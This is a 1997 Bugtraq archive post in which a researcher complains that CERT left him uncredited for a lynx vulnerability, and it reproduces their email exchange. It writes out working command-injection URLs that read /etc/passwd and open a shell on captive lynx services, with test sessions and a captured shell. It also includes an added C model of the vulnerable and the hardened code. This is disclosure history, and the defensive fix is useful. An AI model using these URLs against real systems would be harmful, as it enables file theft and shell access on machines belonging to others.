Bugtraq mailing list archives

CERT does it again.


From: dynamo () IME NET (dynamo () IME NET)
Date: Tue, 22 Jul 1997 09:43:00 -0400


This is a post about CERT, and about how I didn't get credit for telling them
about a hole I found.  I've got pretty much every letter from me to them.

Here's basically what happened (as I see it):

1) I told CERT about it; they tried some crazy, nonsensical things to get it
        to work that the average Unix user would know don't work.
2) They got the hole to work locally but they didn't appear to realize it was a
        hole (and I thought security profs would).
3) They posted it to the lynx-dev list, which is open (I think), and by
        doing that they released the hole to the public. (I thought that
        CERT was supposed to keep holes under wraps until they get them fixed.)
4) They posted a VB that had a 'workaround' that didn't actually solve the
        problem. (Even if you can't 'g' to a URL you can still hit '?' or 'v',
        depending on the version and if bookmarks are on, and usually get to
        Yahoo. You can enter URL tags at a Yahoo search prompt and force
        a LYNXDOWNLOAD.) Plus, I said that at the end of my first letter to
        them.

I'm really let down by CERT.  From now on I'm posting straight to Bugtraq.

To CERT: I told you about this hole.  Without me, you wouldn't have known,
and the least you could do is get me the credit I deserved.

-------------------------------------------------------------------------------

From dynamo () ime net Thu Jul 17 22:52:48 1997
Date: Fri, 13 Jun 1997 13:57:01 -0400 (EDT)
From: dynamo () ime net
To: cert () cert org
Cc: brent () ime net
Subject: Hello, I believe youll find this interesting.

I spoke to one of your people on the phone today, and she said pretty
much that if you provide info that you guys don't already have, you
would give credit to the person who told you inside the advisory. With
that in mind, I would like to tell you about something I've noticed. It
relates to universities and WAIS systems that use lynx in order to display
pages.  If you feed lynx a URL like:
LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
on many systems it will show you their file; on a surprisingly large
number of systems there is no shadow.  Sometimes you can't use /dev/stdin
and you need your tty or some other place. Now, because this calls
system() (I think.. I didn't check the source),
LYNXDOWNLOAD://Method=-1/File=;/bin/sh;/SugFile=/dev/stdin
also works and gives you a shell prompt.  I believe that this is a real
problem for many universities out there.
Now, if someone cannot (g) to a random URL, they can
usually maneuver to Yahoo... and from there get a link redirector to go to
these sites in <a href="">a</a> format.  Note: this pretty much makes
disallowing lynxexec: and file: as well as (g) useless.
Thanks,
dynamo
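
The mechanism described in the message above, as an added example that is not part of the original post or of lynx's source: a small C model of a download handler in which the File= and SugFile= values taken from a LYNXDOWNLOAD:// URL are pasted into a command string and passed to system() (the behaviour the poster suspects), placed beside a hardened handler that execs cp with an argv array and refuses shell metacharacters up front. The URL parsing, the buffer sizes, and the /tmp paths used by the self-check are assumptions made for the example.

```c
/* Added example, not lynx source: a model of the bug class the post
 * describes.  shell_command_for()/vulnerable_download() build the string
 * that /bin/sh -c would receive, so ";/bin/sh;" in File= runs a shell.
 * safe_download() execs cp with an argv array, so no shell ever parses the
 * names.  Buffer sizes and the /tmp paths in demo_safe_copy() are
 * assumptions for the example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Copy the value following "key" (e.g. "/File=") into out.  The value runs
 * to the next "/SugFile=" or to the end of the URL, so a File= value may
 * itself contain slashes, as /etc/passwd does.  Returns 0 on success. */
static int url_param(const char *url, const char *key, char *out, size_t outsz)
{
    const char *p = strstr(url, key);
    if (p == NULL) return -1;
    p += strlen(key);
    const char *end = strstr(p, "/SugFile=");
    size_t n = end ? (size_t)(end - p) : strlen(p);
    if (n >= outsz) return -1;
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

/* VULNERABLE: URL-derived names pasted into a shell command line.  Returns
 * the exact string /bin/sh -c would receive (static buffer), or NULL. */
const char *shell_command_for(const char *url)
{
    static char cmd[600];
    char file[256], sug[256];
    if (url_param(url, "/File=", file, sizeof file) != 0) return NULL;
    if (url_param(url, "/SugFile=", sug, sizeof sug) != 0) return NULL;
    int n = snprintf(cmd, sizeof cmd, "cp %s %s", file, sug);
    return (n < 0 || (size_t)n >= sizeof cmd) ? NULL : cmd;
}

int vulnerable_download(const char *url)
{
    const char *cmd = shell_command_for(url);
    return cmd ? system(cmd) : -1;   /* ';' '|' '`' '$(' all honoured by sh */
}

/* Names that only make sense to a shell are refused up front.  With the
 * argv-based exec below this is defence in depth, not the fix itself. */
int has_shell_meta(const char *s)
{
    return strpbrk(s, ";|&`$<>(){}*?\n\r") != NULL;
}

/* HARDENED: exec cp directly.  ";/bin/sh;" is now just a filename that
 * does not exist.  "--" keeps a name starting with '-' from being read as
 * an option.  Returns cp's exit status, or -1 on a local error. */
int safe_download(const char *url)
{
    char file[256], sug[256];
    if (url_param(url, "/File=", file, sizeof file) != 0) return -1;
    if (url_param(url, "/SugFile=", sug, sizeof sug) != 0) return -1;
    if (has_shell_meta(file) || has_shell_meta(sug)) return -1;

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "cp", "--", file, sug, NULL };
        execvp("cp", argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Self-check: copy a file this process creates (constructed sample) through
 * safe_download() and confirm the copy exists.  Returns 0 on success. */
int demo_safe_copy(void)
{
    const char *src = "/tmp/lynxdl_src.txt", *dst = "/tmp/lynxdl_dst.txt";
    FILE *f = fopen(src, "w");
    if (f == NULL) return -1;
    fputs("constructed sample\n", f);
    fclose(f);
    unlink(dst);
    char url[600];
    snprintf(url, sizeof url, "LYNXDOWNLOAD://Method=-1/File=%s/SugFile=%s", src, dst);
    if (safe_download(url) != 0) return -1;
    return access(dst, R_OK) == 0 ? 0 : -1;
}

int main(void)
{
    const char *evil = "LYNXDOWNLOAD://Method=-1/File=;/bin/sh;/SugFile=/dev/stdin";
    printf("shell would run: %s\n", shell_command_for(evil));
    printf("safe_download(evil) -> %d (refused)\n", safe_download(evil));
    printf("demo_safe_copy()    -> %d\n", demo_safe_copy());
    return 0;
}
```

The point of the split is that the fix is not the metacharacter filter but the exec: once cp receives its arguments as a vector, a name is only ever a name, which is also why the poster's observation that the SugFile target must be writable still holds for the hardened path (cp itself enforces it).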

-------------------------------------------------------------------------------

From cert () cert org Thu Jul 17 22:50:34 1997
Date: Tue, 17 Jun 97 10:22:04 EDT
From: "CERT(R) Coordination Center" <cert () cert org>
To: dynamo () ime net
Cc: brent () ime net, "CERT(R) Coordination Center" <cert () cert org>
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)

-----BEGIN PGP SIGNED MESSAGE-----

Hi Dynamo,

<dynamo () ime net> writes:
> pages.  If you feed lynx a URL like:
> LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
> on many systems it will show you their file; on a surprisingly large
> number of systems there is no shadow.  Sometimes you can't use /dev/stdin
> and you need your tty or some other place. Now, because this calls
> system() (I think.. I didn't check the source),
> LYNXDOWNLOAD://Method=-1/File=;/bin/sh;/SugFile=/dev/stdin
> also works and gives you a shell prompt.  I believe that this is a real
> problem for many universities out there.
> Now, if someone cannot (g) to a random URL, they can
> usually maneuver to Yahoo... and from there get a link redirector to go to
> these sites in <a href="">a</a> format.  Note: this pretty much makes
> disallowing lynxexec: and file: as well as (g) useless.

We tried both of the exploits that you discuss here, and we must be missing
something as we couldn't get either of them to work.

In the first case, what we did was attempt to attack the machine
"www.victim.example.com" from the machine "attacker.example.org" (note the
different domains - these are machines on separate networks).

        attacker.example.org %  lynx http://www.victim.example.com
                { and within lynx ... }
        g
        LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
        Enter a filename: /usr/users/attacker/tmp/foo

The file "/usr/users/attacker/tmp/foo" contains the password file from
attacker.example.org, not the password file from www.victim.example.com.

The next test we tried was to attack the local machine, to see if we could
read the /etc/shadow file:

        attacker.example.org %  lynx /etc/shadow
        Alert!:  Unable to access document.
        lynx: Can't access start file file://localhost/{...}/etc/shadow

which would be expected since /etc/shadow is not world readable, and lynx
is not a setuid program.

        attacker.example.org %  lynx http://www.attacker.example.org
                { and within lynx ... }
        g
        LYNXDOWNLOAD://Method=-1/File=/etc/shadow/SugFile=/dev/stdin
        Enter a filename: /usr/users/attacker/tmp/foo
        -- press space for next page --/shadow: Permission denied

Finally, we tried the second exploit you gave above, and the terminal
froze with the following errors:

        Saving.....cp: Insufficient arguments (0)
          Arrow keys: Up and Down to move. Right Usage: cp [-f] [-i] [-p] f1 f2ack.
         H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history       cp [-f] [-i] [-p] f1 ... fn d1
                                           cp -r|R [-f] [-i] [-p] d1 ... dn-1 dn
                                                                                (\!) \h \$

An attempt to use the second exploit with this modified operation:

        LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh

also failed to produce a shell.

Is there some other part of the exploit that we have misunderstood?  Thanks
for your report -- we look forward to any further pointers you may have.

Regards,
Rob.

| Rob McMillan                          Email:     cert () cert org
|| CERT Coordination Center (*)         Phone:     +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute      Fax:       +1 (412) 268 6989
|||| Carnegie Mellon University         Web:       http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890        Timezone:  GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software
  Engineering Institute is sponsored by the U.S. Department of Defense.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM6anMHVP+x0t4w7BAQHTPQP9FMuNoaLRiwWEU/fTDyuOn6zOnjFZlFXc
x5yvnGSojfWuQBCmGn3HTVDk+Kf7h2T8igdWUPtim9UGOW6uyMk/z4z1W/m+mHQ7
Rb2uTDdEyy7wJCVtdd1UkEaDwovt4m8Jx4BeDbA7feycaL0m3ypfWVPaAPVr0Nu0
BH7fLzp0Iw8=
=+nB7
-----END PGP SIGNATURE-----

-------------------------------------------------------------------------------

From dynamo () ime net Thu Jul 17 22:53:09 1997
Date: Wed, 18 Jun 1997 21:38:54 -0400 (EDT)
From: dynamo () ime net
To: "CERT(R) Coordination Center" <cert () cert org>
Cc: brent () ime net
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)

Well, first I've gotten it to work. I'm currently away from my house right
now and don't have the machine name on me.. it was a [edited out] machine and I
emailed the person who runs it already. I grabbed this from the email I
had sent him.. I'll give you a bigger list of affected boxes when I get
back.
Here's my screen capture:
Saving.....
/bin/cp: missing file arguments
Try `/bin/cp --help' for more information.

bash$ bin           dev         lib         proc        tmp

vmlinuz

boot        etc         lost+found  root        usr         zImage

cdrom       home        mnt         sbin        var         zImage.mem

bash$
---------------
I'll send you more info in a bit. This does work.
First off, the file you select as SugFile must be writable if you do put
one in; second, all you need to do is disable downloading and this problem
is fixed. I wouldn't have emailed you if it didn't work.
dynamo
-------------------------------------------------------------------------------

From cert () cert org Thu Jul 17 22:50:47 1997
Date: Thu, 19 Jun 97 17:39:43 EDT
From: "CERT(R) Coordination Center" <cert () cert org>
To: dynamo () ime net
Cc: brent () ime net, "CERT(R) Coordination Center" <cert () cert org>
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)

-----BEGIN PGP SIGNED MESSAGE-----

Hi,

First, thanks for the feedback.

<dynamo () ime net> writes:
> Well, first I've gotten it to work. I'm currently away from my house right
> now and don't have the machine name on me.. it was a [edited out] machine and I
> emailed the person who runs it already. I grabbed this from the email I
> had sent him.. I'll give you a bigger list of affected boxes when I get
> back.
> Here's my screen capture:
> Saving.....
> /bin/cp: missing file arguments
> Try `/bin/cp --help' for more information.
>
> bash$ bin           dev         lib         proc        tmp
>
> vmlinuz
>
> boot        etc         lost+found  root        usr         zImage
>
> cdrom       home        mnt         sbin        var         zImage.mem
>
> bash$
> ---------------
> I'll send you more info in a bit. This does work.
> First off, the file you select as SugFile must be writable if you do put
> one in; second, all you need to do is disable downloading and this problem
> is fixed. I wouldn't have emailed you if it didn't work.

Understood.  We know that you wouldn't have sent us mail if you didn't have
something that you think was worthwhile and needed addressing.  Since we've
been unable to replicate the problem that you are discussing, we want to
make sure that we are understanding what you are doing, so that we can
better understand the problem.  We're glad that you took the time to advise
us in the first place; our aim is to better understand what you are saying
in case we are missing something.

We tried the exploits again, and were able to get a shell on the local
machine, but not on the remote machine.

Can you send us a typescript (using the "script" command) where you
replicate the problem, executing a "uname -a" on the local machine, and
then when you get a shell on the remote machine, execute a "uname -a" in
that shell?  The typescript may show us something that you were doing that
we have missed.

Thanks again for any feedback.

Regards,
Rob.

| Rob McMillan                          Email:     cert () cert org
|| CERT Coordination Center (*)         Phone:     +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute      Fax:       +1 (412) 268 6989
|||| Carnegie Mellon University         Web:       http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890        Timezone:  GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software
  Engineering Institute is sponsored by the U.S. Department of Defense.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM6mo8HVP+x0t4w7BAQES0gP+PQAb5JVwyn6Qmv18cVJLzpIlApTzkMoR
wqvsntnkZ62lIH/xTBnpyjSytbASuMhV9NRD/bc93rCtzjBBAhqAjjyMW0PoD65A
qouCYpOj4rcDmlmD1RjEEc3XAvwFiDKRXFzKnM/QCsXfIoLOg4tp2cNq6TFRS4nU
jdrXV6nDje8=
=tayo
-----END PGP SIGNATURE-----

-------------------------------------------------------------------------------


From dynamo () ime net Thu Jul 17 22:53:31 1997
Date: Sat, 21 Jun 1997 23:01:03 -0400 (EDT)
From: dynamo () ime net
To: "CERT(R) Coordination Center" <cert () cert org>
Cc: brent () ime net
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)

Okay, now what I attached is something that I sent in email to the admin
of the box that it worked on.. as it worked by accident.. he didn't turn off
downloading like I emailed him that he should... in that case maybe he
didn't get it.. you may want to see if you can contact him.. I've tried
plenty of times and I'm sick of getting my mail bounced back.. after about
10 tries one didn't.. ANYWAY
It's clearly a shell. Note that I did not SEE my command line as I typed it
in, but after hitting enter it did execute.  I know it works on a few
other operating systems than lynx. But like I said.. the answer is just
disallowing downloading. I believe there are more internal URLs in lynx
that cause problems.  I found this after doing a strings `which
lynx`|less.
So anyway, I hope you get the word out. For credit, "Aaron of Internet
Maine (ime.net)" would be great.


  [Part 2, ""  Text/PLAIN  40 lines]
  [Unable to print this part]
-------------------------------------------------------------------------------

From dynamo () ime net Thu Jul 17 22:53:53 1997
Date: Sun, 22 Jun 1997 02:08:20 -0400 (EDT)
From: dynamo () ime net
To: "CERT(R) Coordination Center" <cert () cert org>
Cc: brent () ime net
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)

On the same bug I was talking about...
Oh, on another note.. what if someone did something like this:

<HTML><TITLE>lame</TITLE><BODY>
see my page
</BODY></HTML>


-------------------------------------------------------------------------------

From cert () cert org Thu Jul 17 22:51:10 1997
Date: Mon, 23 Jun 97 17:09:35 EDT
From: "CERT(R) Coordination Center" <cert () cert org>
To: Aaron of Internet Maine <dynamo () ime net>
Cc: brent () ime net, "CERT(R) Coordination Center" <cert () cert org>
Subject: lynx vulnerability (VU#5135)

-----BEGIN PGP SIGNED MESSAGE-----

Hi Aaron,

> Okay, now what I attached is something that I sent in email to the admin
> of the box that it worked on.. as it worked by accident.. he didn't turn off
> downloading like I emailed him that he should... in that case maybe he
> didn't get it.. you may want to see if you can contact him.. I've tried
> plenty of times and I'm sick of getting my mail bounced back.. after about
> 10 tries one didn't.. ANYWAY
> It's clearly a shell. Note that I did not SEE my command line as I typed it
> in, but after hitting enter it did execute.

Okay, thanks for sending in the script.  The script filled in the missing
link - we didn't realise that the machine you were connecting to was
running lynx under a captive service.  We'll be getting in touch with the
lynx folks.

Thanks again for your report.

Regards,
Rob.

| Rob McMillan                          Email:     cert () cert org
|| CERT Coordination Center (*)         Phone:     +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute      Fax:       +1 (412) 268 6989
|||| Carnegie Mellon University         Web:       http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890        Timezone:  GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software
  Engineering Institute is sponsored by the U.S. Department of Defense.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM67nB3VP+x0t4w7BAQHlqwP+JouvUYGTllRwv7zCbhLMUOatzcgw8oVp
rCKA/BlIroXALNWofjzhoJPiXjRCxY5cYCOvXUlvpFyvHduB3TYQiguDskjMCJY9
6rdStW6EmTyzw8aipCWOKegxZmV4lNhp/cv8ljeu1lUrqVwz+uFDTygdmccBXrKt
bgZ2c6XnVm0=
=hEXp
-----END PGP SIGNATURE-----

-------------------------------------------------------------------------------


From cert () cert org Thu Jul 17 22:51:27 1997
Date: Wed, 16 Jul 97 16:12:03 EDT
From: "CERT(R) Coordination Center" <cert () cert org>
To: dynamo () ime net
Cc: brent () ime net, "CERT(R) Coordination Center" <cert () cert org>
Subject: Re: lynx vulnerability (VU#5135)

Hi Aaron,

<dynamo () ime net> writes:
> I notice that you released a vendor initiated bulletin.. with no credit
> given to me.  Would you mind fixing that?

Thanks for drawing that to our attention.  I'll pass that along to our
writers.

Thanks again for reporting the original problem to us.

Regards,
Rob.

| Rob McMillan                          Email:     cert () cert org
|| CERT Coordination Center (*)         Phone:     +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute      Fax:       +1 (412) 268 6989
|||| Carnegie Mellon University         Web:       http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890        Timezone:  GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software
  Engineering Institute is sponsored by the U.S. Department of Defense.

-------------------------------------------------------------------------------
